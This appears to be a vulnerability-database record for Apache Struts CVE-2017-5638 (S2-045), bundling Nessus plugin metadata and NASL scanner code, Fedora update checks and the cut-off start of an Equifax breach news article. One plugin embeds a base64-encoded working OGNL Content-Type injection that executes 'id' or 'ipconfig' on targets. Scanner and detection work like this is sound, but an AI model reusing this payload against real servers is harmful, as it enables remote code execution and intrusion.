"cpe:2.3:a:apache:struts:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:portal:11.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.1:b3:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.4:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2023-05-18T14:10:22", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:10", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T15:36:20", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-05-31T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:44", "description": "Security fix for CVE-2016-1181, CVE-2016-1182\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-07-15T00:00:00", "type": "nessus", "title": "Fedora 24 : struts (2016-d717fdcf74)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:struts", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-D717FDCF74.NASL", "href": "https://www.tenable.com/plugins/nessus/92292", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-d717fdcf74.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92292);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1181\", \"CVE-2016-1182\");\n script_xref(name:\"FEDORA\", value:\"2016-d717fdcf74\");\n\n script_name(english:\"Fedora 24 : struts (2016-d717fdcf74)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-1181, CVE-2016-1182\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-d717fdcf74\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected struts package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"struts-1.3.10-18.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-29T14:12:49", "description": "Security fix for CVE-2016-1181, CVE-2016-1182\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-07-15T00:00:00", "type": "nessus", "title": "Fedora 23 : struts (2016-21bd6a33af)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:struts", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-21BD6A33AF.NASL", "href": "https://www.tenable.com/plugins/nessus/92234", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-21bd6a33af.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92234);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1181\", \"CVE-2016-1182\");\n script_xref(name:\"FEDORA\", value:\"2016-21bd6a33af\");\n\n script_name(english:\"Fedora 23 : struts (2016-21bd6a33af)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-1181, CVE-2016-1182\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-21bd6a33af\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected struts package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"struts-1.3.10-18.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and 